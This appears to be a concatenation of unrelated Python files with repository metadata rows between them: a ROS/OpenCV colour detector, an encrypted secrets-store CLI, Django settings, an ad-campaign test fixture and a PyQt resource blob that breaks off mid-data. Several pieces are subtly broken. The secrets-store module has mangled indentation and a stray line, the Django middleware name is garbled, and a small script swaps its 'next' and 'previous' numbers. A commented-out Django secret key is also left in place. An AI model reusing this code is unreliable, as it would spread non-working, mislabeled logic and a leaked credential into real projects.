        self.pub.publish(self.red)
        self.pub1.publish(self.blue)
        self.pub2.publish(self.green)
        self.pub3.publish(len(points))
    """
    * Function Name: Colorno
    * Input: lower,upper,color
    * Output: Returns the number of contours of the 'color' provided . Also draws rectanlges of that color around that contour.
    * Logic: Extracts the required color from 'lower' and 'upper' followed by erosion and then closing. Then contour is found using
    findContours() fucntion and a rectangle is drawn around the centroid.
    * Example Call: Colorno([97,51,227],[143,198,253],(255,0,0))
    """
    def Colorno(self, lower, upper, color):
        self.mask = cv2.inRange(
            self.hsv, lower, upper
        )  # Extraction from the lower-upper range
        kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
        erode = cv2.erode(
            self.mask, kernel, iterations=1
        )  # Eroded to remove white noise as well as to stop the detection of blue from whycon coordinates in whycon/image_out.
        dilation = cv2.dilate(
            erode, kernel, iterations=16
        )  # To join different detected segments of the same petal in one segment to draw rectangle.
        self.closing = cv2.erode(dilation, kernel, iterations=1)
        abc, contours, hierarchy = cv2.findContours(
            self.closing, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE
        )
        # To find contour centroid
        for x in range(0, len(contours)):
            M = cv2.moments(contours[x])
            cx = int(M["m10"] / M["m00"])
            cy = int(M["m01"] / M["m00"])
            # print "Centroid = ", cx, a", ", cy
            # cv2.circle(img,(cx,cy), 3, (127,127,127), -1)
            # Only keep the centroid if it is >40 px away (in x or y) from
            # every point already stored — crude duplicate suppression.
            if len(self.points) > 0:
                self.b = 0
                for x in range(0, len(self.points)):
                    difx = abs(cx - self.points[x][0])
                    dify = abs(cy - self.points[x][1])
                    if (difx > 40) or (dify > 40):
                        self.b += 1
                if self.b == len(self.points):
                    self.points.append([cx, cy, color])
            else:
                self.points.append([cx, cy, color])
if __name__ == "__main__":
    test = ColorDetect()
    rospy.sleep(2)  # allow the subscriber to receive a first frame
    red = 0
    blue = 0
    green = 0
    flag = 0
    while True:
        test.DetectColor()
        cv2.imshow("image", test.img)
        cv2.waitKey(1)
        # NOTE(review): destroying all windows every iteration and then
        # calling rospy.spin() (which blocks until shutdown) inside the loop
        # means the loop body effectively runs once — confirm intent.
        cv2.destroyAllWindows()
        rospy.spin()
| [
"atharvakarpate@gmail.com"
] | atharvakarpate@gmail.com |
87d4a703cd60d8776b09c67b7e09adbf576a56ae | 5e2fc6d87f9c70bfd9c51daa29408d49796da7ce | /keylocker/__init__.py | 616eaa792ea408b5bc33773e17dd1531d548a021 | [] | no_license | vpuhoff/keylocker | cf2d9b6f028e190a32a0d056514f142a8b391b38 | 6134df1ee3c4c0c521f47d56d57a466b93212ae2 | refs/heads/master | 2023-09-01T08:56:39.085789 | 2021-02-10T06:48:52 | 2021-02-10T06:48:52 | 194,481,376 | 3 | 0 | null | 2023-08-01T22:58:12 | 2019-06-30T06:05:20 | Python | UTF-8 | Python | false | false | 2,835 | py | import pickledb
import fire
from cryptography.fernet import Fernet, InvalidToken
class Storage(object):
    """Dict-like secrets store: values are Fernet-encrypted strings kept in a
    pickledb JSON file; the symmetric key is read from a key file."""
    def __init__(self, filename='secrets.json', key_file='storage.key', key=None):
        # pickledb with auto-dump enabled (second arg True).
        self.db = pickledb.load(filename,True)
        try:
            if not key:
                with open(key_file,'rb') as keyfile:
                    key = keyfile.read()
            self.fernet = Fernet(key)
        except FileNotFoundError as e:
            # NOTE(review): on a missing key file this only prints;
            # self.fernet stays unset, so later item access raises
            # AttributeError instead of a clear error.
            print('ERROR: Key file not found!')
    def __setitem__(self, key, value):
        # Encrypt the stringified value; store the token as text.
        self.db[key] = self.fernet.encrypt(str(value).encode()).decode()
    def __getitem__(self, key):
        # NOTE(review): calls exit() on failure — CLI behavior baked into
        # the library class (exit code 999 for missing/invalid material).
        try:
            raw= self.db[key]
            if raw:
                raw = str(raw)
                return self.fernet.decrypt(raw.encode()).decode()
            else:
                print('ERROR: Key not found')
                exit(999)
        except InvalidToken as e:
            print('ERROR: Invalid key file!')
            exit(999)
        except FileNotFoundError as e:
            print('ERROR: Key file not found!')
            exit(999)
    def keys(self):
        # Return all key names known to the underlying pickledb store.
        return self.db.getall()
# NOTE(review): Storage is already defined above in this same module, and
# fire is already imported at the top of the file — both lines below are
# redundant; left unchanged to preserve import-time behavior.
from . import Storage
import fire
class Manager(object):
    """CLI facade over the encrypted Storage backend (driven by python-fire)."""
    def __init__(self):
        self.storage = Storage()
    def init(self):
        """Create a fresh storage key: generate a Fernet key, stretch it with
        PBKDF2-HMAC-SHA256, and write the result to 'storage.key'."""
        import base64
        import os
        from cryptography.fernet import Fernet
        from cryptography.hazmat.backends import default_backend
        from cryptography.hazmat.primitives import hashes
        from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
        passphrase = Fernet.generate_key()
        derivation = PBKDF2HMAC(
            algorithm=hashes.SHA256(),
            length=32,
            salt=os.urandom(16),
            iterations=100000,
            backend=default_backend()
        )
        derived_key = base64.urlsafe_b64encode(derivation.derive(passphrase))
        with open('storage.key','wb') as key_out:
            key_out.write(derived_key)
        return 'storage.key'
    def write(self,key, value):
        """Encrypt *value* and store it under *key*."""
        self.storage[key]=value
        return 'OK'
    def remove(self,key):
        """Delete one key, or every key when '*' is given."""
        if key == '*':
            for name, _ in self.storage.db.dgetall():
                self.storage.db.drem(name)
        else:
            try:
                self.storage.db.drem(key)
                return 'OK'
            except KeyError:
                print('ERROR: Key not found')
                exit(888)
    def read(self,key):
        """Return the decrypted value stored under *key*."""
        return self.storage[key]
    def list(self):
        """Print every stored key name, one per line."""
        for name in list(self.storage.keys()):
            print(name)
print(item)
def main():
fire.Fire(Manager, name='keylocker')
if __name__ == "__main__":
main() | [
"vpuhoff@live.ru"
] | vpuhoff@live.ru |
e006c474da9752e4dc45b6db91e3485f58e9b8b6 | 048e8b68e5c5f447bea15f0932d06dd7e8b0bba0 | /BBS/settings.py | 9832763d9fa61bae620c1843e30fc400bf309604 | [] | no_license | jszccdp/BBS | 8f5f85c68e3bf5f814ea9b16c4e3c293edf5db5e | 8616c68d0a602b664b5850c5cf58618a10fc2532 | refs/heads/master | 2020-04-26T22:42:40.849583 | 2019-03-06T09:28:07 | 2019-03-06T09:28:07 | 173,880,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,628 | py | """
Django settings for BBS project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
from decouple import config
from decouple import Csv
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
#SECRET_KEY = 'hk4a-wn_k#a)*kyd#_#0&9mhzfnm6_fuyz&e+6d+tx#5ybx_c0'
SECRET_KEY=config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG',default=False,cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS',cast=Csv())
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'boards',
'widget_tweaks',
'accounts',
'boards.templatetags.form_tags',
'boards.templatetags.gravatar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommoipionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'BBS.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'BBS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default':dj_database_url.config(
default=config('DATABASE_URL')
)
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
os.path.join(BASE_DIR,'static'),
]
LOGOUT_REDIRECT_URL='home'
LOGIN_REDIRECT_URL = 'home'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGIN_URL = 'login' | [
"1162219262@qq.com"
] | 1162219262@qq.com |
96b7ae9b557800edf96fa234ccdc6c5e23c59dea | 1125345341e496920b661e612cd67cdb96a1d170 | /createCampaign/parameter_tests/CREATIVE_NAME/test02_valid_p.py | 4718d851e9cdc50ac51047f4f44e5f3ae48e305b | [] | no_license | Stephen-Williams/swarm-qa | 0bac526f0ee44b8c3677fb35959e6f7d0e258be2 | 90e36b5eab475788d9ab54051ad9c2736f3633ec | refs/heads/master | 2021-01-01T20:11:51.033059 | 2015-07-08T16:07:06 | 2015-07-08T16:07:06 | 38,764,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | { 'all':
{ '0':
{ 'ADOMAIN': 'abc.com',
'ADVERTISER_CATEGORY': 'IAB8-5',
'APP_FILTER': 'sites',
'CREATIVE_ATTR': '0',
'CREATIVE_BASE_64': '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',
'CREATIVE_HEIGHT': 50,
'CREATIVE_NAME': 'Creative Name.png',
#CREATIVE_NAME is valid
'CREATIVE_TYPE': '3',
'CREATIVE_WIDTH': 320,
'DAY_PARTING': '111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'DELIVERY_RATE_UNIT': 'impressions',
'ENCODE_A_HREF': 0,
'START': 1433908800, #June 10th 2015, midnight
'END': 1434513599, #June 16th 2015, 23:59:59
'EXCHANGE': 'mpb',
'LANG': 'en',
'LOCATIONS': ['CAN', 'USA'],
'MAX_RATE_IN_DOLLARS': 0.8,
'MPB_TYPE': '',
'NECTAR_ALLOCATION': 9602,
'NECTAR_CRID': 9602,
'QUANTITY': '1000000',
'TARGET_ANDROID': True,
'TARGET_IOS': True,
'SITE_LIST': ['0c3e797b933649ab84619d8e8a1c0ab6',
'07ab13ce6ae511e281c11231392559e4',
'f8289871fe0d48318d36bf3ea197f65d',
'bd80deae924f11e281c11231392559e4'],
'TAG': '<A HREF="http://ad.foobar.net/ddm/jump/N6041.368591.JUICEMOBILE.CA/B8760366.118973391;sz=728x90;ord=[NECTAR_TIME]?">\r\n'
'<IMG SRC="http://ad.foobar.net/ddm/ad/N6041.368591.JUICEMOBILE.CA/B8760366.118973391;sz=728x90;ord=[NECTAR_TIME]?" '
'BORDER=0 WIDTH=728 HEIGHT=90 '
'ALT="Advertisement"></A>'
}
}
}
| [
"stephen.williams@juicemobile.com"
] | stephen.williams@juicemobile.com |
864174abe531accd7b988c0891e93ed7128e2c7f | 859cfe4db3d1c42a0a17423ae86742726d15e642 | /Task3.py | 2a488b395a434a32c6f3cf76258a74108a6cc47c | [] | no_license | GQ312/Chapter1-Part2 | fd15d79792c61fc036dc806bc42e149c777eeea4 | 696fa7c3a46e79ba83b1d77530f7bcce815e2027 | refs/heads/master | 2021-03-06T21:24:39.322369 | 2020-03-10T05:03:11 | 2020-03-10T05:03:11 | 246,224,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | num = int(input("Write your number: "))
print("Next number: " + str((num - 1)))
print("Previous number: " + str((num + 1))) | [
"nurbolot0312@gmail.com"
] | nurbolot0312@gmail.com |
cf1c7ed666e3e2ffefa00c4742ed5302dc0b15bd | 8f580f80eae1f947ebb3fed099a996ba961dfe95 | /view/resources_rc.py | 7179cf4a2b5a045727fb4f05db70fd80865c4d6c | [] | no_license | ankhbold/sesmim_training | 45efb172b8269708cc4a352fa944a5c2b35936a1 | 162ba8fe798c565fbd46f6b5f06f0d8aa17d2962 | refs/heads/master | 2020-04-28T08:01:02.805373 | 2019-03-19T00:34:19 | 2019-03-19T00:34:19 | 175,111,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,103 | py | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt4 (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore
qt_resource_data = "\
\x00\x00\x06\xa7\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\
\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\
\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95\x2b\
\x0e\x1b\x00\x00\x06\x3c\x49\x44\x41\x54\x58\x47\xd5\x57\x09\x6c\
\x94\x45\x14\xfe\x76\xb7\xbb\xdb\xed\x6e\xb7\xf7\xdd\xd2\x83\x80\
\x50\xac\x5c\x2d\x50\x48\x53\x11\xac\x20\x68\x50\x23\x04\x30\x96\
\x43\xb4\x82\x07\xd1\x28\xda\x20\x42\x62\x8a\xa6\x68\xc1\x40\x01\
\xc5\x03\x42\x21\x02\xc5\x88\xd8\x16\x0a\x85\x26\xdc\x5d\xa0\xa4\
\xb4\x50\x28\x3d\xe8\xb5\xdb\x8b\xde\xdd\x7b\x7d\x33\xdd\xca\x6e\
\x8f\x85\x48\x90\xf8\x6d\x9a\x7f\xfe\xf9\xdf\xcc\xfb\xe6\xcd\xf7\
\xde\x4c\x05\xc9\xf9\x33\x2c\x78\x82\x10\x5a\x9f\x4f\x0c\xff\x1f\
\x02\x26\x8b\x11\x3a\x63\x37\xba\x0d\xed\xe8\x32\xb4\xf1\x27\x7b\
\x67\xfd\x8f\x82\x07\x6a\xc0\x64\x36\xa2\x5d\xdf\x0c\x6f\x59\x30\
\xa2\xfd\x67\x23\xc4\x75\x34\x64\x62\x05\x11\xe8\x40\x75\xc7\x4d\
\xa8\xd4\xd9\x68\xee\xa9\x81\x52\xe2\x05\x91\xd0\xc9\x3a\xca\x1e\
\x16\x8b\x19\x06\xb3\x9e\xb5\x20\x11\xc9\x7a\x3b\xad\x70\x48\x80\
\x39\x61\x13\xaf\x9c\x90\x0e\x3f\x79\x18\xef\x33\xd3\x64\x6d\xba\
\x06\xb8\x49\x7d\x21\x14\xf4\x06\xb0\xa1\xab\x0a\xdb\xae\xae\x44\
\xbb\xae\x11\x2e\x62\x25\x8f\x8c\xd1\x62\xe0\xe4\x75\xa6\x2e\x28\
\xc4\x9e\x98\xe0\x97\x00\x77\x67\x7f\xe4\x57\x67\xd8\x91\x18\x92\
\x40\xbb\xae\x09\x53\x03\x5f\xc5\xc2\x31\xeb\xf8\xfb\xfe\x92\xaf\
\x70\xb6\x36\x93\x26\xd5\xc1\x49\x28\x81\xde\xac\xa5\x05\x09\x30\
\x35\xe8\x15\x24\x46\xa5\x70\x9b\xdf\x6e\xa4\x20\xb7\xf2\x67\x2c\
\x8a\xdc\x00\x1f\x97\x60\x1e\xb5\x00\xc5\x70\xfe\x8d\x11\xcf\xab\
\xda\x83\xec\xf2\x9d\x70\x76\x92\xf3\x3e\x86\x41\x35\xc0\xf6\x37\
\x36\xa8\xd7\xf9\xcd\xe6\x8b\x78\x27\x67\x14\x2e\xab\xb3\xe0\x2a\
\xf1\x80\x5c\xe2\xce\xf7\xdd\x4d\xe2\x47\x36\xf3\x20\x17\xbb\x61\
\xe1\x11\x6f\x14\x37\x9e\xc1\x82\xd1\xc9\x98\x3e\xec\x0d\x14\x6a\
\x72\x11\xe5\x13\xcf\x9d\x5f\xac\x3b\x8a\xf3\xb5\x47\x78\xb4\x4a\
\x9a\xce\x12\x79\xb1\xd5\x4b\x2f\x06\x44\x80\x85\x4d\x2a\x72\xc1\
\x86\xb8\x2c\x72\x7e\x01\x9b\x2e\x2d\x86\xaf\x4b\x18\x39\x35\xa0\
\x43\xd7\x8c\x84\xf0\x15\x88\x0f\x59\x08\x0f\x99\x9f\x75\x04\x70\
\x55\x7d\x12\x69\xaa\x44\x7c\x3a\x79\x3f\x9e\xf6\x89\xc3\x27\xa7\
\xa6\x91\xcd\x22\xdc\x6a\xb9\x44\xa4\xd6\x22\xc8\x75\x04\xb7\x4b\
\x3a\x16\x09\x4f\xe7\x00\x08\x04\x02\xfe\xce\x30\x20\x02\x4c\x70\
\xab\x26\xee\xe0\xed\xef\x0a\x12\xb9\x73\xbd\xb9\x87\x56\xef\x8d\
\xf4\x17\x8a\x31\x6f\xe4\x6a\x94\xb6\x5c\xe0\xdf\x19\xb4\xb4\xdf\
\x62\x27\x09\xf6\xcc\xad\x41\xca\xf9\xd7\x78\xdf\x9a\x29\x07\xb0\
\xaf\x64\x03\x3e\x9a\xb4\xfb\x1f\xe7\xb7\x5b\x54\xb4\x30\x99\x9d\
\x73\x06\x3b\x02\x6c\xf5\x3e\xb2\x10\x72\x3a\x0c\x19\xc5\xeb\xb9\
\x00\x7b\xc3\xed\x8b\xb5\x53\x0f\x73\x9b\xfa\xce\x72\x3b\xb5\xb7\
\xea\x34\xb8\x46\x11\x48\xce\x9f\x09\x7f\x79\x04\xf6\x5e\x5f\x47\
\x7b\x1f\xc4\xdb\x15\xad\x45\x56\x2b\x20\xef\xee\x5e\x1e\xd9\xfe\
\xb0\x23\x60\x20\x81\xc5\x04\xcc\xe1\x6d\x26\x38\xa6\xd6\x56\x52\
\x7c\x72\xec\x21\xde\xc7\xe0\x45\x93\xd7\x75\xdc\xe6\xed\xcc\x9b\
\xa9\xf8\x5e\xb5\x02\x5e\x2e\x41\x48\x89\x3f\x81\xa4\xf1\x5b\x91\
\x53\xf1\x03\xff\x16\x17\x3c\x1f\xa7\xef\x66\xf0\xb6\xc9\x6c\x22\
\x0d\x65\x43\x2c\x92\xf2\x77\x5b\xd8\x11\x30\xd3\x6a\x43\x94\x91\
\x94\x46\xa4\x70\xca\x59\x96\x4a\x63\x7d\x9e\xb3\x5b\xf1\xdd\xf6\
\x62\x1c\x28\xfd\x1a\x1b\xcf\xcf\x87\xa7\x2c\x90\xd4\x3e\x0c\xb3\
\x22\x56\xf0\x6f\x23\x3d\xa3\x49\x94\x9e\xe8\x31\x74\x21\xd4\x6d\
\x0c\x15\xac\x56\xde\xbf\xb3\xf0\x43\xb8\x53\xda\x0e\x86\x7e\x04\
\x2c\x3c\xec\x6d\x14\x56\xa6\x56\x23\x15\x8f\x71\xbe\x33\xf9\xb7\
\x93\x95\x7b\xb0\xe6\x74\x3c\x8a\x1a\xf3\x91\xf1\x92\x1a\x9f\xc7\
\x1e\xc0\xf4\xd0\xc5\x78\x7b\x6c\x1a\x36\x17\x2c\xc7\x35\x4d\x1e\
\xb7\x0b\x24\xe5\xb7\xe9\x1b\xa0\x94\x7a\xd3\x78\x03\x45\xab\x0c\
\x45\x4d\xa7\x06\x5d\x3d\x83\x1d\x01\x26\x90\x4e\xfd\x3d\x1a\xec\
\x43\x83\x8d\x10\x09\x9c\xd0\x44\x55\x6e\x59\x56\x38\xb4\xa6\x6e\
\xe8\x29\x32\x13\xfd\x67\x59\xad\x7b\x21\x97\xb8\x61\x75\xcc\x4f\
\xf0\xa5\x42\x55\x50\x9f\x85\x16\x6d\x3d\x5c\xc5\x5e\xbc\x88\x69\
\xa9\x08\x7d\x5b\xf0\x26\x3c\xa4\xfe\x56\xeb\x81\xb0\x23\xc0\x1c\
\xd6\x50\x79\x75\x76\x72\xe1\xe5\xd3\x42\xbf\xb3\xb5\x87\xb0\x6b\
\xf6\x1d\xcc\x19\x9e\x84\xb4\x99\x17\xb1\xbb\xe8\x33\x9c\xa8\xfc\
\xd5\x3a\xe2\x3e\x02\x14\x11\xa4\x9f\x17\x51\xd7\x79\x8b\x48\x29\
\x49\xac\x65\x50\x77\xdd\x19\x54\xf9\xb6\xb0\x23\x20\xa6\x0a\x77\
\x59\x73\x8c\xb7\x63\x02\xe6\xf2\x8c\xf8\xe6\xd9\x7c\xb4\x6a\x1b\
\xa0\xaa\xcf\xe6\xfd\x5f\x4c\xfb\x03\x23\x3c\xa2\xf1\x7b\xe9\x66\
\x94\xdd\xbb\xc2\xfb\xfa\x90\x53\xbe\x0b\x33\x42\x13\x79\x5b\xa5\
\xce\x81\x33\xa9\xde\x91\x73\x86\x01\x85\xa8\xa5\xa7\x0e\xa9\xd3\
\xcf\x91\x98\x94\x48\xfc\x2b\x84\x32\x20\x13\x5b\x54\xcb\xb9\x26\
\xe4\x62\x77\x72\xb0\x84\xb6\x21\x81\x0b\xb0\x0f\xea\xce\x0a\x9c\
\xab\x3d\x8c\x83\xa5\x1b\x49\x1f\x1a\xf4\x18\x3b\xf1\x71\x5e\x2c\
\x65\xcc\x7d\x9b\xa1\x30\x80\x00\x13\x0e\x3b\x68\x92\x63\x0f\xf2\
\x55\x6f\xb9\xbc\x8c\x4e\xc0\x48\xbe\x12\xb3\xc5\x04\xbd\xa9\x87\
\xfe\x74\x7c\x7f\x85\xf4\x33\xd3\x4f\x26\x92\x53\x01\x6b\xc2\xbb\
\xe3\xb7\x63\x72\xe0\x5c\x2a\x48\xaf\xf3\x03\xab\x7f\xd9\x1d\x0c\
\x76\x5b\xc0\xc0\x06\x69\xba\xca\xf1\x67\xd9\x56\x44\x07\xcc\xc6\
\xfb\x13\x7f\x44\x43\x77\x15\x39\xd5\x42\x40\xe6\xce\x4e\x0a\x12\
\xa9\x17\x2f\x56\xde\x74\xe0\x78\x48\xfd\xd0\x6d\xec\x40\xd2\xb8\
\x6d\xdc\x39\xdb\x86\x36\x9d\x9a\xd4\x63\xb6\xce\xe8\x18\x03\x08\
\x30\x28\xe8\xd0\xc9\x2e\xdf\x81\xa3\x65\xe9\x98\x44\x5a\xd8\x91\
\x70\x83\x72\x7c\x32\x65\x44\x2d\x4d\xde\x88\x0e\x7d\x0b\x7f\x36\
\x76\x57\x93\x1e\x62\x90\x9e\x50\x8c\x29\x41\x2f\xf3\x54\x9d\x15\
\xf1\x16\x02\xe5\x4f\xc1\x57\x16\x4e\x76\xcd\xd6\x19\x87\x86\xc3\
\xfb\x00\x4b\xc9\x40\xc5\x08\x7c\x10\xbd\x0b\x32\x5a\x39\xc3\x3d\
\xad\x86\x52\xac\x8d\xde\x95\xa4\x83\xde\xf4\x62\xe9\x99\xa6\x5a\
\x42\xf6\x2d\x94\x8e\xe1\x14\xb5\x9d\xbc\xff\x78\xc5\x2f\x38\x7c\
\x2b\xd5\xa1\x16\x1c\x12\x60\x60\x9a\x60\xfb\x19\xa6\x7c\x86\x6f\
\x49\xa8\x32\x8a\x22\xe4\x4e\xd5\xae\x03\x55\xed\xd7\xb9\xda\xcb\
\x5a\x55\xbc\xd2\x31\x8d\x84\xb9\x8d\xc5\x2a\xba\xc0\xf4\x21\xb7\
\x92\x48\x94\xa6\xda\x89\xd6\x16\x0f\x24\xd0\x07\x46\xc4\x48\x67\
\x05\x3b\x9c\xd8\xe5\x82\x09\x50\x48\x25\x5a\x2c\x94\xda\x89\x8d\
\x9d\x1d\xcb\xa2\x36\xf1\x4c\xe9\x43\x2e\x45\x22\x73\x88\x48\x88\
\xe2\x96\x46\xac\xb7\xb6\x1d\x42\x28\x10\x91\x23\x09\x1d\x50\xce\
\xbc\xb8\xb0\x27\xab\x1b\xac\xdf\x16\xec\xb6\x93\x5f\xbd\x0f\x41\
\x8a\x51\xbc\x2c\x33\x0c\xf7\x18\x0f\x29\x15\xb7\x42\xcd\x49\xbb\
\xdb\x10\xc3\xa0\x22\x7c\x54\xf8\xba\x84\xd2\x01\xf4\x1e\xae\xa8\
\x8f\x5b\x7b\x80\xe7\xc3\x96\x22\x2e\x64\x01\x4f\x63\x5b\x3c\x16\
\x02\x0c\xec\x94\xdc\x5e\xb8\x8a\x8e\xe1\xfb\x24\x58\xc6\xb0\x3b\
\x87\x2d\x1e\x7a\x0b\xfe\x0d\x58\xe5\x3c\x53\x73\x90\xce\x18\x31\
\xdd\x8e\x3b\x91\x51\xf2\x25\xbf\x63\xd8\x96\xe7\x87\x16\xe1\xa3\
\x40\x6b\xec\xe2\x19\xc2\x8a\x58\xdf\x55\xbe\x0f\x8f\x6d\x0b\x6c\
\xc1\x84\xc7\xfe\x5f\xe8\xef\x9c\xe1\x3f\x21\xe0\x08\x4f\x98\x00\
